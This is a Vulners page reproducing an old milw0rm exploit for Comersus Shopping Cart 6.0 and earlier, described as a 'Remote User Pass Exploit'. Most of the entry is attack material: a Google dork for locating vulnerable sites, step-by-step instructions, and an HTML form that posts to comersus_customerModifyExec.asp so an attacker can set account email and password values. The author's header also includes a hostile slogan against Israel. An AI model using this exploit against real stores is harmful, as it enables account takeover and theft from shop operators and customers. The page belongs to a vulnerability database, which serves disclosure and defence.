Lucene search
K

Comersus Shopping Cart <= 6.0 - Remote User Pass Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 40 Views

Comersus Shopping Cart v6 Remote User Pass Exploi

Code

                                                *******************************************************************************
# Title   :  Comersus Shopping Cart &#60;= v6 Remote User Pass Exploit
# Author  :  &#34;ajann&#34; from Turkey
# Contact :   :( 
# S.Page  :  http://www.comersus.com/
# $$      :  Free
# Dork    :  Powered by Comersus v6 Shopping Cart
# DorkEx  :

http://www.google.com.tr/search?hl=tr&q=Powered+by+Comersus+v6+Shopping+Cart&btnG=Ara&meta=

KAHROLSUN ISRAEL

-Register Site
-Login
-Open Exploit
-Edit: User Email , User Password
-Submit Form

*******************************************************************************

&#60;form method=&#34;post&#34; name=&#34;modCust&#34; action=&#34;http://target/[path]/comersus_customerModifyExec.asp&#34;&#62;
  &#60;table width=&#34;421&#34; border=&#34;0&#34;&#62;  
      &#60;tr&#62; 
      
    &#60;/tr&#62;
    &#60;tr&#62; 
      &#60;td width=&#34;168&#34;&#62;Name&#60;/td&#62;
      &#60;td width=&#34;220&#34;&#62;      
        &#60;input type=text name=customerName value=&#34;test&#34;&#62;
      &#60;/td&#62;
    &#60;/tr&#62;    
    &#60;tr&#62; 
      &#60;td width=&#34;168&#34;&#62;Last Name&#60;/td&#62;
      &#60;td width=&#34;220&#34;&#62;      
        &#60;input type=text name=lastName value=&#34;test&#34;&#62;
      &#60;/td&#62;
    &#60;/tr&#62;
    &#60;tr&#62; 
      &#60;td width=&#34;168&#34;&#62;Company&#60;/td&#62;
      &#60;td width=&#34;220&#34;&#62;      
        &#60;input type=text name=customerCompany value=&#34;test&#34;&#62;
      &#60;/td&#62;
    &#60;/tr&#62;
    &#60;tr&#62; 
      &#60;td width=&#34;168&#34;&#62;Phone&#60;/td&#62;
      &#60;td width=&#34;220&#34;&#62;        
       &#60;input type=text name=phone value=&#34;123456789&#34;&#62;
      &#60;/td&#62;
    &#60;/tr&#62;
    &#60;tr&#62; 
      &#60;td width=&#34;168&#34;&#62;&#60;strong&#62;Email&#60;/strong&#62;&#60;/td&#62;
      &#60;td width=&#34;220&#34;&#62;   
    
        &#60;input type=&#34;text&#34; name=&#34;email&#34; value=&#34;Please Add Mail&#34;&#62; 
        Edit
      &#60;/td&#62;
    &#60;/tr&#62;
    &#60;tr&#62; 
      &#60;td width=&#34;168&#34;&#62;&#60;strong&#62;Password&#60;/strong&#62;&#60;/td&#62;
      &#60;td width=&#34;220&#34;&#62;         
        &#60;input type=text name=password value=&#34;Please Add Pass&#34;&#62; 
        Edit
      &#60;/td&#62;
    &#60;/tr&#62;
    &#60;tr&#62; 
      &#60;td width=&#34;168&#34;&#62;Address&#60;/td&#62;
      &#60;td width=&#34;220&#34;&#62;         
        &#60;input type=text name=address value=&#34;test&#34;&#62;
      &#60;/td&#62;
    &#60;/tr&#62;
    &#60;tr&#62; 
      &#60;td width=&#34;168&#34;&#62;Zip&#60;/td&#62;
      &#60;td width=&#34;220&#34;&#62;         
        &#60;input type=text name=zip value=&#34;08050&#34;&#62;
      &#60;/td&#62;
    &#60;/tr&#62;
    &#60;tr&#62; 
      &#60;td width=&#34;168&#34;&#62;State&#60;/td&#62;
      &#60;td width=&#34;220&#34;&#62;         
        
      &#60;SELECT name=stateCode size=1&#62;
      &#60;OPTION value=&#34;&#34;&#62;Select the state
        &#60;option value=&#34;1&#34;&#62;Please Type County below
      &#60;/OPTION&#62;
      &#60;/SELECT&#62;
      &#60;/td&#62;
    &#60;/tr&#62;
    &#60;tr&#62; 
      &#60;td width=&#34;168&#34;&#62;Non listed state&#60;/td&#62;
      &#60;td width=&#34;220&#34;&#62;         
       &#60;input type=text name=state value=&#34;&#34;&#62;
      &#60;/td&#62;
    &#60;/tr&#62;
    &#60;tr&#62; 
      &#60;td width=&#34;168&#34;&#62;City&#60;/td&#62;
      &#60;td width=&#34;220&#34;&#62;         
        &#60;input type=text name=city value=&#34;test&#34;&#62;
      &#60;/td&#62;
    &#60;/tr&#62;    
    &#60;tr&#62; 
      &#60;td width=&#34;168&#34;&#62;Country&#60;/td&#62;
      &#60;td width=&#34;220&#34;&#62;                 
        
      &#60;SELECT name=countryCode&#62;
      &#60;OPTION value=&#34;&#34;&#62;Select the country
        &#60;option value=&#34;AF&#34; selected&#62;AFGHANISTAN
      &#60;/OPTION&#62;
      &#60;/SELECT&#62;       
      &#60;/td&#62;
    &#60;/tr&#62;
    
    
    
    &#60;tr&#62; 
      &#60;td width=&#34;168&#34;&#62;&nbsp;&#60;/td&#62;
      &#60;td width=&#34;220&#34;&#62;&nbsp;&#60;/td&#62;
    &#60;/tr&#62;
    &#60;tr&#62; 
      &#60;td colspan=&#34;2&#34;&#62;        
          &#60;input type=&#34;submit&#34; name=&#34;Modify&#34; value=&#34;Modify&#34;&#62;                            
      &#60;/td&#62;
    &#60;/tr&#62;
    &#60;/table&#62;
   &#60;/form&#62;          

# milw0rm.com [2009-01-12]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation